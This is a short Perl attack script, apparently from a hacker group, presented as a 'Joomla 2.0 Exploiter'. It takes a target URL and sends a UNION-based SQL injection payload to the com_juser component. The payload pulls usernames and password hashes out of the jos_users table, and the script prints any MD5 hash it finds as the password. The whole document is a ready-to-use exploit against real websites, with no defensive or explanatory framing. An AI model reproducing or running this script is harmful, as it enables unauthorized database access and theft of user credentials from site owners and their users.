Joomla 2.0 Exploiter

1.  
2. #!/usr/bin/perl
3. use IO::Socket::INET;
4. use LWP::UserAgent;
5. system("clear");
6. print "------------------------------------------------------------------------\n";
7. print "########################################################################\n";
8. print "#                         Joomla 2.0 Exploiter                         #\n";
9. print "#                      *Coded by Mauritania Attacker*                  #\n";
10. print "# Greetz: AnonGhost - Mauritania HaCker Team - Procoder'z Team Albania #\n";
11. print "########################################################################\n";
12. print "------------------------------------------------------------------------\n\n";
13. $target = $ARGV[0];
14. $component = $ARGV[1];
15. if($target eq '' || $component eq '')
16. {
17. print "Usage: ./exploit.pl <target> <1> \n";
18. print "-----------------------------------\n";
19. print " Available Exploits :              \n";
20. print " 1- Joomla User Exploit            \n";
21. print "-----------------------------------\n";
22. print " Example: ./exploit.pl http://www.site.com/ 1 \n\n";
23. exit(1);
24. }
25.  
26. open(FILE, "> contents11.txt");
27.  
28. if($target !~ /http:\/\//)
29. {
30. $target = "http://$target";
31. }
32.  
33. sleep 1.5;
34. $agent = LWP::UserAgent->new();
35. $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
36.  
37.  
38. if($component == 1)
39. {
40. $host = $target . "index.php?option=com_juser&task=show_profile&id=33+and+13=33+union+select+1,2,concat%28username,0x3a,password%29nafsh,4,5,6,7,8,9,10,11,12,13+from+jos_users--";
41. print " . . Exploiting Database on target $target . . \n\n";
42. sleep 1;
43. $req = $agent->request(HTTP::Request->new(GET=>$host));
44. $content = $req->content;
45. if($content =~ /([0-9a-fA-F]{32})/)
46. {
47. $password = $1;
48. print "[+] Password found --> $password :) .\n\n";
49. sleep 1;
50. }
51. else
52. {
53. print "[-] Password not found :( . \n\n";
54. }
55. }